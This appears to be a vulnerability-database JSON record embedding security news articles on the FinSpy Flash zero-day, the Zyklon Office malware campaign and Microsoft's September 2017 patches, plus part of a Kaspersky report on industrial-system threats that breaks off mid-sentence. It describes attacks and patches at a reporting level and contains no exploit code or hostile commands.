"id": "KREBS:F0163956314C713411403F8497E4F9A4", "href": "https://krebsonsecurity.com/2017/09/adobe-microsoft-plug-critical-security-holes/", "title": "Adobe, Microsoft Plug Critical Security Holes", "type": "krebs", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:54", "bulletinFamily": "info", "cvelist": ["CVE-2017-11292", "CVE-2017-8759"], "description": "[](<https://4.bp.blogspot.com/-LuHe8r34EGA/WeTTGl-43GI/AAAAAAAAuZs/o112IbvjTJESNEg8li8Xr0V3AEMG3uSmgCLcBGAs/s1600/flash-player-zero-day-exploit.png>)\n\n**[FinSpy](<https://thehackernews.com/2014/08/company-that-sells-finfisher-spying.html>)**\u2014the infamous surveillance malware is back and infecting high-profile targets using a new Adobe Flash zero-day exploit delivered through Microsoft Office documents. \n \nSecurity researchers from Kaspersky Labs have [discovered](<https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/>) a new zero-day remote code execution vulnerability in Adobe Flash, which was being actively exploited in the wild by a group of advanced persistent threat actors, known as **BlackOasis**. \n \nThe critical type confusion vulnerability, tracked as **CVE-2017-11292**, could lead to code execution and affects Flash Player 21.0.0.226 for major operating systems including Windows, Macintosh, Linux and Chrome OS. \n \nResearchers say BlackOasis is the same group of attackers which were also responsible for exploiting another zero-day vulnerability ([CVE-2017-8759](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>)) discovered by FireEye researchers in September 2017. \n \nAlso, the final FinSpy payload in the current attacks exploiting Flash zero-day (CVE-2017-11292) shares the same command and control (C&C) server as the payload used with CVE-2017-8759 (which is Windows [.NET Framework remote code execution](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>)). \n \nSo far BlackOasis has targeted victims in various countries including Russia, Iraq, Afghanistan, Nigeria, Libya, Jordan, Tunisia, Saudi Arabia, Iran, the Netherlands, Bahrain, United Kingdom and Angola. \n \nThe newly reported Flash zero-day exploit is at least the 5th zero-day that BlackOasis group exploited since June 2015. \n \nThe zero-day exploit is delivered through Microsoft Office documents, particularly Word, attached to a spam email, and embedded within the Word file includes an ActiveX object which contains the Flash exploit. \n \nThe exploit deploys the FinSpy commercial malware as the attack's final payload. \n\n\n> \"The Flash object contains an ActionScript which is responsible for extracting the exploit using a custom packer seen in other FinSpy exploits,\" the Kaspersky Labs researchers say.\n\nFinSpy is a highly secret surveillance tool that has previously been associated with Gamma Group, a British company that legally sells surveillance and espionage software to government agencies across the world. \n \nFinSpy, also known as **FinFisher**, has extensive spying capabilities on an infected system, including secretly conducting live surveillance by turning ON its webcams and microphones, recording everything the victim types on the keyboard, intercepting Skype calls, and exfiltration of files. \n \nTo get into a target's system, FinSpy usually makes use of various attack vectors, including spear phishing, manual installation with physical access to the affected device, zero-day exploits, and watering hole attacks. \n\n\n> \"The attack using the recently discovered zero-day exploit is the third time this year we have seen FinSpy distribution through exploits to zero-day vulnerabilities,\" said Anton Ivanov, lead malware analyst at Kaspersky Lab.\n\n> \"Previously, actors deploying this malware abused critical issues in Microsoft Word and Adobe products. We believe the number of attacks relying on FinSpy software, supported by zero day exploits such as the one described here, will continue to grow.\"\n\nKaspersky Lab reported the vulnerability to Adobe, and the company has [addressed](<https://helpx.adobe.com/security/products/flash-player/apsb17-32.html>) the vulnerability with the release of Adobe Flash Player versions 27.0.0.159 and 27.0.0.130. \n \nJust last month, ESET researchers discovered legitimate downloads of several popular apps like WhatsApp, Skype, VLC Player and WinRAR (reportedly [compromised at the ISP level](<https://thehackernews.com/2017/09/gamma-finfisher-hacking-tool.html>)) that were also distributing FinSpy. \n \nSo, businesses and government organizations around the world are strongly recommended to install the update from Adobe as soon as possible. \n \nMicrosoft will also likely be releasing a security update to patch the Flash Player components used by its products.\n", "modified": "2017-10-16T15:53:54", "published": "2017-10-16T04:52:00", "id": "THN:5AD427A8B33BDFD2EE553727C6CE4EE0", "href": "https://thehackernews.com/2017/10/flash-player-zero-day.html", "type": "thn", "title": "Hackers Use New Flash Zero-Day Exploit to Distribute FinFisher Spyware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:16", "bulletinFamily": "info", "cvelist": ["CVE-2017-11882", "CVE-2017-8759"], "description": "[](<https://3.bp.blogspot.com/-yiz5vmLsg4o/Wl-U8988sCI/AAAAAAAAvf4/MyZ8AtDGSl88TrrW406iMHvPHLdbNXf_ACLcBGAs/s1600/microsoft-office-malware.png>)\n\nSecurity researchers have spotted a new malware campaign in the wild that spreads an advanced botnet malware by leveraging at least three recently disclosed vulnerabilities in Microsoft Office. \n \nDubbed **Zyklon**, the fully-featured malware has resurfaced after almost two years and primarily found targeting telecommunications, insurance and financial services. \n \nActive since early 2016, Zyklon is an HTTP botnet malware that communicates with its command-and-control servers over Tor anonymising network and allows attackers to remotely steal keylogs, sensitive data, like passwords stored in web browsers and email clients. \n \nZyklon malware is also capable of executing additional plugins, including secretly using infected systems for DDoS attacks and cryptocurrency mining. \n \nDifferent versions of the Zyklon malware has previously been found being advertised on a popular underground marketplace for $75 (normal build) and $125 ( Tor-enabled build). \n \nAccording to a recently published [report](<https://www.fireeye.com/blog/threat-research/2018/01/microsoft-office-vulnerabilities-used-to-distribute-zyklon-malware.html>) by FireEye, the attackers behind the campaign are leveraging three following vulnerabilities in Microsoft Office that execute a PowerShell script on the targeted computers to download the final payload from its C&C server. \n \n**1) .NET Framework RCE Vulnerability **([CVE-2017-8759](<https://thehackernews.com/2017/09/windows-zero-day-spyware.html>))\u2014this remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input, allowing an attacker to take control of an affected system by tricking victims into opening a specially crafted malicious document file sent over an email. Microsoft already released a security patch for this flaw in September updates. \n \n**2) Microsoft Office RCE Vulnerability **([CVE-2017-11882](<https://thehackernews.com/2017/11/microsoft-office-rce-exploit.html>))\u2014it\u2019s a 17-year-old memory corruption flaw that Microsoft patched in [November patch update](<https://thehackernews.com/2017/11/microsoft-patch-tuesday.html>) allows a remote attacker to execute malicious code on the targeted systems without requiring any user interaction after opening a malicious document. \n \n**3) Dynamic Data Exchange Protocol **([DDE Exploit](<https://thehackernews.com/2017/10/ms-office-dde-malware.html>))\u2014this technique allows attackers to leverage a built-in feature of Microsoft Office, called DDE, to [perform code execution](<https://thehackernews.com/2017/11/apt28-office-dde-malware.html>) on the targeted device without requiring Macros to be enabled or memory corruption. \n \nAs explained by the researchers, attackers are actively exploiting these three vulnerabilities to deliver Zyklon malware using spear phishing emails, which typically arrives with an attached ZIP file containing a malicious Office doc file. \n \nOnce opened, the malicious doc file equipped with one of these vulnerabilities immediately runs a PowerShell script, which eventually downloads the final payload, i.e., Zyklon HTTP malware, onto the infected computer. \n\n\n> \"In all these techniques, the same domain is used to download the next level payload (Pause.ps1), which is another PowerShell script that is Base64 encoded,\" the FireEye researchers said.\n\n> \"The Pause.ps1 script is responsible for resolving the APIs required for code injection. It also contains the injectable shellcode.\"\n\n> \"The injected code is responsible for downloading the final payload from the server. The final stage payload is a PE executable compiled with .Net framework.\"\n\nInterestingly, the PowerShell script connects to a dotless IP address (example: **http://3627732942**) to download the final payload. \n** \n** **What is Dotless IP Address?** If you are unaware, dotless IP addresses, sometimes referred as 'Decimal Address,' are decimal values of IPv4 addresses (represented as dotted-quad notation). Almost all modern web browsers resolve decimal IP address to its equivalent IPV4 address when opened with \"http://\" following the decimal value. \n \nFor example, Google's IP address 216.58.207.206 can also be represented as http://3627732942 in decimal values (Try this online converter). \n \nThe best way to protect yourself and your organisation from such malware attacks are always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source. \n \nMost importantly, always keep your software and systems up-to-date, as threat actors incorporate recently discovered, but patched, vulnerabilities in popular software\u2014Microsoft Office, in this case\u2014to increase the potential for successful infections.\n", "modified": "2018-01-17T18:25:22", "published": "2018-01-17T07:25:00", "id": "THN:C21D17F1D92C12B031AB9C761BBD004A", "href": "https://thehackernews.com/2018/01/microsoft-office-malware.html", "type": "thn", "title": "Hackers Exploiting Three Microsoft Office Flaws to Spread Zyklon Malware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:55", "bulletinFamily": "info", "cvelist": ["CVE-2017-8746", "CVE-2017-9417", "CVE-2017-8759", "CVE-2017-8723"], "description": "[](<https://3.bp.blogspot.com/-Y6iaD1KFbD0/WbkO3mrT3oI/AAAAAAAAAIs/MIeMugyFZtMKjyA5SeEgQRSs65OuO6eNQCLcBGAs/s1600/windows-0day-exploit.png>)\n\nGet ready to install a fairly large batch of security patches onto your Windows computers. \n \nAs part of its [September Patch Tuesday](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/5984735e-f651-e711-80dd-000d3a32fc99>), Microsoft has released a large batch of security updates to patch a total of 81 CVE-listed vulnerabilities, on all supported versions of Windows and other MS products. \n \nThe latest security update addresses 27 critical and 54 important vulnerabilities in severity, of which 38 vulnerabilities are impacting Windows, 39 could lead to Remote Code Execution (RCE). \n \nAffected Microsoft products include: \n \n\n\n * Internet Explorer\n * Microsoft Edge\n * Microsoft Windows\n * .NET Framework\n * Skype for Business and Lync\n * Microsoft Exchange Server\n * Microsoft Office, Services and Web Apps\n * [Adobe Flash Player](<https://thehackernews.com/2017/09/adobe-security-patch.html>)\n \n \n\n\n### .NET 0-Day Flaw Under Active Attack\n\n \nAccording to the company, four of the patched vulnerabilities are publicly known, one of which has already been actively exploited by the attackers in the wild. \n \nHere's the list of publically known flaws and their impact: \n \n**Windows .NET Framework RCE (CVE-2017-8759)\u2014**A zero-day flaw, [discovered](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) by researchers at cybersecurity firm FireEye and privately reported it to Microsoft, resides in the way Microsoft .NET Framework processes untrusted input data. \n \nMicrosoft says the flaw could allow an attacker to take control of an affected system, install programs, view, change, or delete data by tricking victims into opening a specially crafted document or application sent over an email. \n \nThe flaw could even allow an attacker to create new accounts with full user rights. Therefore users with fewer user rights on the system are less impacted than users who operate with admin rights. \n \nAccording to [FireEye](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), this zero-day flaw has actively been exploited by a well-funded cyber espionage group to deliver [FinFisher Spyware](<https://thehackernews.com/2014/08/company-that-sells-finfisher-spying.html>) (FinSpy) to a Russian-speaking \"entity\" via malicious Microsoft Office RTF files in July this year. \n \nFinSpy is a highly secret surveillance software that has previously been associated with British company Gamma Group, a company that legally sells surveillance and espionage software to government agencies. \n \nOnce infected, FinSpy can perform a large number of secret tasks on victims computer, including secretly monitoring computers by turning ON webcams, recording everything the user types with a keylogger, intercepting Skype calls, copying files, and much more. \n \n\"The [new variant of FINSPY]...leverages heavily obfuscated code that employs a built-in virtual machine \u2013 among other anti-analysis techniques \u2013 to make reversing more difficult,\" researchers at FireEye said. \n \n\"As likely another unique anti-analysis technique, it parses its own full path and searches for the string representation of its own MD5 hash. Many resources, such as analysis tools and sandboxes, rename files/samples to their MD5 hash in order to ensure unique filenames.\" \n \n\n\n### Three Publicly Disclosed Vulnerabilities\n\n \nThe remaining three publicly known vulnerabilities affecting the Windows 10 platform include: \n \n\n\n * **Device Guard Security Feature Bypass Vulnerability (CVE-2017-8746): **This flaw could allow an attacker to inject malicious code into a Windows PowerShell session by bypassing the Device Guard Code Integrity policy.\n * **Microsoft Edge Security Feature Bypass Vulnerability (CVE-2017-8723): **This flaw resides in Edge where the Content Security Policy (CSP) fails to properly validate certain specially crafted documents, allowing attackers to trick users into visiting a website hosting malware.\n * **Broadcom BCM43xx Remote Code Execution Vulnerability (CVE-2017-9417):** this flaw exists in the Broadcom chipset in HoloLens, which could be exploited by attackers to send a specially crafted WiFi packet, enabling them to install programs, view, change, or delete data, even create new accounts with full admin rights.\n \n\n\n### BlueBorne Attack: Another Reason to Install Patches Immediately\n\n \nAlso, the recently disclosed Bluetooth vulnerabilities known as \"[BlueBorne](<https://thehackernews.com/2017/09/blueborne-bluetooth-hacking.html>)\" (that affected more than 5 Million Bluetooth-enabled devices, including Windows, was silently patched by Microsoft in July, but details of this flaw have only been released now. \n \nBlueBorne is a series of flaws in the implementation of Bluetooth that could allow attackers to take over Bluetooth-enabled devices, spread malware completely, or even establish a \"man-in-the-middle\" connection to gain access to devices' critical data and networks without requiring any victim interaction. \n \nSo, users have another important reason to apply September security patches as soon as possible in order to keep hackers and cyber criminals away from taking control over their computers. \n \nOther flaws patched this month include five information disclosure and one denial of service flaws in Windows Hyper-V, two cross-site scripting (XSS) flaws in SharePoint, as well as four memory corruption and two remote code execution vulnerabilities in MS Office. \n \nFor installing security updates, simply head on to Settings \u2192 Update & security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually. \n \n\n", "modified": "2017-09-13T11:09:52", "published": "2017-09-13T00:09:00", "id": "THN:5133F80C8A11FE7678A971A326DDA682", "href": "https://thehackernews.com/2017/09/windows-zero-day-spyware.html", "type": "thn", "title": "Immediately Patch Windows 0-Day Flaw That's Being Used to Spread Spyware", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-03-30T15:53:03", "bulletinFamily": "blog", "cvelist": ["CVE-2014-8361", "CVE-2017-8759"], "description": "\n\n_For many years, Kaspersky Lab experts have been uncovering and researching cyberthreats that target a variety of information systems \u2013 those of commercial and government organizations, banks, telecoms operators, industrial enterprises, and individual users. In this report, Kaspersky Lab Industrial Control Systems Cyber Emergency Response Team (_[_Kaspersky Lab ICS CERT_](<https://ics-cert.kaspersky.com/>)_) publishes the findings of its research on the threat landscape for industrial automation systems conducted during the second half of 2017. _\n\n_The main objective of these publications is to provide information support to global and local incident response teams, enterprise information security staff and researchers in the area of industrial facility security._\n\n## Overview of ICS vulnerabilities identified in 2017\n\n_The analysis of vulnerabilities was performed based on vendor advisories, publicly available information from open vulnerability databases (ICS-CERT, CVE, Siemens Product CERT), as well as the results of Kaspersky Lab ICS CERT's own research. Vulnerability data published on the _[_ICS-CERT_](<https://ics-cert.us-cert.gov/>)_ website in 2017 was used to create statistical diagrams._\n\n### Vulnerabilities in various ICS components\n\n#### Number of vulnerabilities identified\n\nIn 2017, the total number of vulnerabilities identified in different ICS components and published on the [ICS-CERT](<https://ics-cert.us-cert.gov/>) website was 322. This includes vulnerabilities identified in general-purpose software and in network protocols that are also relevant to industrial software and equipment. These vulnerabilities are discussed in this report separately.\n\n#### Analysis by Industry\n\nThe largest number of vulnerabilities affect industrial control systems in the energy sector (178), manufacturing processes at various enterprises (164), water supply (97) and transportation (74).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130415/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-1.png>)\n\n_Number of vulnerable products used in different industries \n(according to [ICS-CERT](<https://ics-cert.us-cert.gov/>) classification) \nvulnerabilities published in 2017_\n\n#### Severity levels of the vulnerabilities identified\n\nMore than half (194) of the vulnerabilities identified in ICS systems were assigned [CVSS v.3.0](<https://www.first.org/cvss>) base scores of 7 or higher, corresponding to a high or critical level of risk.\n\n_Table 1 \u2013 Distribution of published vulnerabilities by risk level_\n\n| **Severity score** \n---|--- \n9 to 10 (critical) | 7 to 8.9 (high) | 4 to 6.9 (medium) | 0 to 3.9 (low) \n**Number of vulnerabilities** | 60 | 134 | 127 | 1 \n \nThe highest severity score of 10 was assigned to vulnerabilities identified in the following products:\n\n * [iniNet Solutions GmbH SCADA Webserver](<https://ics-cert.us-cert.gov/advisories/ICSA-17-264-04>),\n * [Westermo MRD-305-DIN, MRD-315, MRD-355, and MRD-455](<https://ics-cert.us-cert.gov/advisories/ICSA-17-236-01>),\n * [Hikvision Cameras](<https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01>),\n * [Sierra Wireless AirLink Raven XE and XT](<https://ics-cert.us-cert.gov/advisories/ICSA-17-115-02>),\n * [Schneider Electric Modicon M221 PLCs and SoMachine Basic](<https://ics-cert.us-cert.gov/advisories/ICSA-17-103-02A>),\n * [BINOM3 Electric Power Quality Meter](<https://ics-cert.us-cert.gov/advisories/ICSA-17-031-01A>),\n * [Carlo Gavazzi VMU-C EM and VMU-C PV](<https://ics-cert.us-cert.gov/advisories/ICSA-17-012-03>).\n\nAll vulnerabilities that were assigned the severity rating of 10 have much in common: they have to do with authentication issues, can be exploited remotely and are easy to exploit.\n\nIn addition, the highest severity rating was assigned to a vulnerability in the [Modicon Modbus Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>), which is discussed below.\n\nIt should be noted that the CVSS base score does not account for the aspects of security that are specific to industrial automation systems or for the distinctive characteristics of each organization's industrial processes. This is why, when assessing the severity of a vulnerability, we recommend keeping in mind, in addition to the CVSS score, the possible consequences of its exploitation, such as the non-availability or limited availability of ICS functionality that affects the continuity of the industrial process.\n\n#### Types of vulnerabilities identified\n\nThe most common types of vulnerabilities include buffer overflow (Stack-Based Buffer Overflow, Heap-Based Buffer Overflow) and improper authentication (Improper Authentication).\n\nAt the same time, 23% of all vulnerabilities identified are web-related (Injection, Path Traversal, Cross-Site Request Forgery (CSRF), Cross-Site Scripting) and 21% are associated with authentication issues (Improper Authentication, Authentication Bypass, Missing Authentication for Critical Function) and with access control problems (Access Control, Incorrect Default Permissions, Improper Privilege Management, Credentials Management).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130422/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-2.png>)\n\n_Most common vulnerability types_\n\nExploitation of vulnerabilities in various ICS components by attackers can lead to arbitrary code execution, unauthorized control of industrial equipment and that equipment's denial of service (DoS). Importantly, most vulnerabilities (265) can be exploited remotely without authentication and exploiting them does not require the attacker to have any specialized knowledge or superior skills.\n\nExploits have been published for 17 vulnerabilities, increasing the risk of their exploitation for malicious purposes.\n\n#### Vulnerable ICS components\n\nThe largest number of vulnerabilities were identified in:\n\n * SCADA/HMI components (88)**, **\n * networking devices designed for industrial environments (66),\n * PLCs (52),\n * and engineering software (52).\n\nVulnerable components also include protection relays, emergency shutdown systems, environmental monitoring systems and industrial video surveillance systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130429/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-3.png>)\n\n_Distribution of vulnerabilities identified by ICS components_\n\n### Vulnerabilities in industrial protocols\n\nAn important part of ICS software security research in 2017 was identifying serious vulnerabilities in implementations of industrial protocols. Specifically, vulnerabilities were identified in the [implementation of the Modbus Protocol in Modicon series controllers](<https://ics-cert.us-cert.gov/advisories/ICSA-17-101-01>) (that vulnerability was assigned a CVSS v. 3 base score of 10), as well as in [implementations of the OPC UA protocol stack](<https://ics-cert.us-cert.gov/advisories/ICSA-17-243-01B>) and in an implementation of the [PROFINET Discovery and Configuration Protocol](<https://ics-cert.us-cert.gov/advisories/ICSA-17-129-01H>). The security issues identified affect entire product families.\n\n### Impact of vulnerabilities in 'traditional' technologies on industrial systems\n\nIn addition to ICS-specific vulnerabilities, a number of serious flaws were identified in H2 2017 in software platforms and network protocols that can be exploited to attack industrial systems.\n\nThe vulnerabilities in the WPA2 protocol unexpectedly turned out to be relevant to industrial solutions. They were found to [affect](<https://ics-cert.kaspersky.com/news/2017/11/15/ics-krack/>) equipment from several vendors, including Cisco, Rockwell Automation, Sierra Wireless, ABB and Siemens. Industrial control systems were also affected by multiple vulnerabilities in [the Dnsmasq DNS server](<https://ics-cert.kaspersky.com/news/2017/12/05/dnsmasq/>), [Java Runtime Environment](<https://ics-cert.us-cert.gov/advisories/ICSA-17-213-02>), [Oracle Java SE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-262-01>), and [Cisco IOS and IOS XE](<https://ics-cert.us-cert.gov/advisories/ICSA-17-094-04>).\n\nVulnerabilities in Intel products can also affect the security of industrial equipment. In the second half of 2017, [information on several vulnerabilities in Intel products](<https://ics-cert.kaspersky.com/news/2017/11/24/intel-updates/>) (ME, SPS and TXE) was published. These vulnerabilities affect mainly SCADA server hardware and industrial computers that use vulnerable CPUs. These include, for example, Automation PC 910 by B&R, Nuvo-5000 by Neousys and the GE Automation RXi2-XP product line. As a rule, vendors do not consider it necessary to release public advisories on vulnerabilities of this type (derived from using third-party technologies). Of course, there are some positive exceptions. For example, Siemens AG has released [an advisory](<https://ics-cert.kaspersky.com/news/2018/03/01/siemens-intel/>) stating that these vulnerabilities affect a range of the company's products. Earlier, the company published [information](<https://cert-portal.siemens.com/productcert/pdf/ssa-874235.pdf>) about similar vulnerabilities in Intel technologies affecting its products.\n\n### IoT device vulnerabilities\n\n2017 was marked by a growing number of vulnerabilities being identified in internet of things (IoT) devices. As a consequence, such vulnerabilities were increasingly often exploited to create botnets. The activity of three new botnets was uncovered in the last two months of 2017 only. These included the [Reaper botnet](<https://ics-cert.kaspersky.com/news/2017/11/09/reaper/>) and new Mirai variants, including the [Satori botnet](<https://ics-cert.kaspersky.com/news/2017/12/14/satori/>).\n\nMultiple vulnerabilities were identified in [Dlink 850L routers](<https://blogs.securiteam.com/index.php/archives/3364>), [WIFICAM wireless IP cameras](<https://pierrekim.github.io/blog/2017-03-08-camera-goahead-0day.html>), [Vacron network video recorders](<https://blogs.securiteam.com/index.php/archives/3445>) and other devices.\n\nOn top of the new IoT device flaws, some old vulnerabilities are still not closed, such as [CVE-2014-8361](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8361>) in Realtek devices and the vulnerability dating back to 2012 that can be exploited to get the configuration of [Serial-to-Ethernet converters](<https://www.bleepingcomputer.com/news/security/thousands-of-serial-to-ethernet-devices-leak-telnet-passwords/>), including the Telnet password, by sending a request on port 30718. The vulnerability in Serial-to-Ethernet converters directly affects the industrial internet of things (IIoT), since many systems that enable the operators of industrial equipment to remotely control its status, modify its settings and control its operation are based on serial interface converters.\n\nThe security of IoT devices is also affected by issues relating to the security of traditional information technology. Specifically, vulnerabilities in implementations of the Bluetooth protocol led to the emergence of the new attack vector, [BlueBorne](<https://ics-cert.kaspersky.com/news/2017/09/15/blueborne/>), which poses a threat to mobile, desktop and IoT operating systems.\n\n## Vulnerabilities identified by Kaspersky Lab ICS CERT\n\nIn 2017, Kaspersky Lab ICS CERT experts not only analyzed the security issues associated with different vendors' ICS components, but also focused on the common ICS components, platforms and technologies used in different vendors' solutions. This type of research is important because vulnerabilities in such components significantly increase the number of potential attack victims. Research in this area continues in 2018.\n\n### Number of vulnerabilities identified\n\nBased on its research, Kaspersky Lab ICS CERT identified 63 vulnerabilities in industrial and IIoT/IoT systems in 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130435/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-4.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby types of components analyzed_\n\nEvery time we identified a vulnerability, we promptly notified the respective product's vendor.\n\n### Number of CVE entries published\n\nDuring 2017, 11 CVE entries were published based on information about vulnerabilities identified by Kaspersky Lab ICS CERT. It should be noted that some of these CVE entries were published after vendors closed vulnerabilities information on which had been provided to them in 2016.\n\nInformation on other vulnerabilities identified by Kaspersky Lab ICS CERT experts will be published after these vulnerabilities are closed by the respective vendors.\n\n### Capabilities provided by the vulnerabilities identified\n\nThe largest number of vulnerabilities identified (29) could allow an attacker to cause denial of service (DoS) remotely. 8% of the vulnerabilities identified could allow an attacker to execute arbitrary code remotely on the target system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/22130442/180322-threat-landscape-for-industrial-automation-systems-in-h2-2017-5.png>)\n\n_Distribution of vulnerabilities identified by Kaspersky Lab ICS CERT in 2017 \nby capabilities provided_\n\n### Vulnerabilities in ICS components\n\nIn 2017, Kaspersky Lab ICS CERT experts identified 30 vulnerabilities in ICS products from different vendors. These are mainly large automation system vendors, such as Schneider Electric, Siemens, Rockwell Automation, Emerson, and others.\n\n#### Severity ratings of the vulnerabilities identified\n\nTo assess the severity of vulnerabilities identified in ICS components, Kaspersky Lab ICS CERT used its own vulnerability rating system based on the metrics defined in [CVSS v3.0](<https://www.first.org/cvss/v2/faq>) (Common Vulnerability Scoring System) standard, with the following vulnerability severity levels identified:\n\n * least severe: CVSS v3.0 base score of 5.0 or less,\n * medium severity: CVSS v3.0 base score of 5.1 to 6.9 (inclusive),\n * most severe: CVSS v3.0 base score of 7.0 or more.\n\nThe absolute majority of vulnerabilities identified are in the most severe group. These include the [XXE vulnerability in industrial solutions](<https://ics-cert.kaspersky.com/news/2017/09/07/closing-an-xxe-vulnerability-in-siemens-industrial-solutions/>) that use the Discovery Service of the OPC UA protocol stack.\n\n#### Vulnerabilities in OPC UA implementations\n\nOne of the research areas involved searching for vulnerabilities in different implementations of the OPC UA technology. This type of research is needed to improve the overall security level of products from different vendors that use the technology in their solutions. Vulnerabilities in such technologies are a Swiss army knife of sorts for attackers, enabling them to hack industrial systems from different vendors.\n\nA total of 17 critical denial-of-service vulnerabilities were identified during the period.\n\nSome of the vulnerabilities were identified in sample software implementations of various OPC UA functions available in the official Github repository. In the process of communicating to several vendors of industrial automation systems, we found out that many of them had used code from such samples in their product code. This means that the vulnerabilities identified may affect complete product lines from different vendors.\n\n### Vulnerabilities in third-party hardware-based and software solutions\n\nKaspersky Lab ICS CERT experts have also analyzed third-party hardware-based solutions that are widely used in industrial automation systems.\n\nSpecifically, experts analyzed the SafeNet Sentinel hardware-based solution by Gemalto. As a result of the research, [15 vulnerabilities](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>) were identified in the software part of the solution (11 in December 2016 and 4 in 2017). These flaws affect a large number of products that use the vulnerable software, including solutions by ABB, General Electric, HP, Cadac Group, Zemax and other software developers, the number of which may reach 40 thousand, according to some estimates.\n\n### Vulnerabilities in internet of things (IoT and IIoT) components\n\nAnother area of research was the assessment of the information security status of internet of things (IoT), components, including industrial internet of things (IIoT) components.\n\nKaspersky Lab experts are working with vendors to improve the security of their solutions with respect to 11 vulnerabilities identified. Vulnerabilities were found in the following components and solutions:\n\n * smart cameras,\n * hardware-based IIoT solutions.\n\nIt should be noted that vulnerabilities in implementations of OPC UA standards, which are discussed above, also directly affect IIoT security.\n\n### Vulnerabilities in industrial routers\n\nIn the past year, 18 vulnerabilities were identified in industrial networking equipment from different vendors. Typical vulnerabilities: information disclosure, privilege escalation, arbitrary code execution, denial of service.\n\n### Working with software vendors\n\nWith respect to information on the vulnerabilities identified, Kaspersky Lab follows the principle of responsible information disclosure, promptly reporting vulnerabilities to the respective software vendors.\n\nIn 2017, Kaspersky Lab ICS CERT researchers actively collaborated with various companies to ensure that the vulnerabilities identified would be closed.\n\nOf the 63 vulnerabilities identified by Kaspersky Lab ICS CERT in 2017, vendors closed 26. Vulnerabilities were closed by Siemens, General Electric, Rockwell Automation, Gemalto and the [OPC Foundation](<https://en.wikipedia.org/wiki/OPC_Foundation>) industrial consortium.\n\nIt should be noted that most vendors of software for industrial automation systems that we have worked with have lately been devoting much more care and resources to the task of closing the vulnerabilities identified and fixing information security issues in their products, including their earlier versions.\n\nAt the same time, the issue of closing vulnerabilities in industrial automation systems remains relevant. In many cases, it takes large vendors a long time to close vulnerabilities in their products. Sometimes software vendors decide to patch only new versions of a vulnerable product, which they are planning to release in the future.\n\nIn addition, some vendors still need to improve the organizational and technical aspects of the procedures they use to inform customers about the vulnerabilities patched. Even after an update has been released, many users are unaware of the relevant security issue and use vulnerable versions of the product. This is particularly important for embedded software, as well as the technologies and specific program modules used by numerous third-party vendors (one example can be found [here](<https://ics-cert.kaspersky.com/reports/2018/01/22/a-silver-bullet-for-the-attacker-a-study-into-the-security-of-hardware-license-tokens/>)).\n\nPositive examples include Siemens and the OPC Foundation, which have quickly closed the vulnerabilities identified and released public advisories on existing vulnerabilities.\n\n## Malware in industrial automation systems\n\nAs we have [mentioned before](<https://ics-cert.kaspersky.com/reports/2017/03/28/threat-landscape-for-industrial-automation-systems-in-the-second-half-of-2016/#3l3>), many industrial companies use modern networking technologies that improve the transparency and efficiency of enterprise management processes, as well as providing flexibility and fault tolerance for all tiers of industrial automation. As a result, industrial networks are increasingly similar to corporate networks \u2013 both in terms of use case scenarios and in terms of the technologies used. The unfortunate flip side of this is that internet threats, as well as other traditional IT threats, increasingly affect the industrial networks of modern organizations.\n\nIn the second half of 2017, Kaspersky Lab security solutions installed on industrial automation systems detected over 17.9 thousand different malware modifications from about 2.4 thousand different malware families.\n\n### Accidental infections\n\nIn the vast majority of cases, attempts to infect ICS computers are accidental and are not part of targeted attacks. Consequently, the functionality implemented in malware is not specific to attacks on industrial automation systems. However, even without ICS-specific functionality, a malware infection can have dire consequences for an industrial automation system, including an emergency shutdown of the industrial process. This was demonstrated by the WannaCry outbreak in May 2017, when several enterprises in different industries had to suspend their industrial processes after being infected with the encryption malware. We wrote about encryption malware-related threats in our [previous report](<https://ics-cert.kaspersky.com/reports/2017/09/28/threat-landscape-for-industrial-automation-systems-in-h1-2017/>) and several articles (see [here](<https://ics-cert.kaspersky.com/reports/2017/06/22/wannacry-on-industrial-networks/>) and [here](<https://ics-cert.kaspersky.com/alerts/2017/06/29/more-than-50-percent-of-organizations-attacked-by-expetr-petya-cryptolocker-are-industrial-companies/>)).\n\n#### Unexpected consequences of the WannaCry outrbreak\n\nIt is important to note that some IT threats can do much more significant harm in an 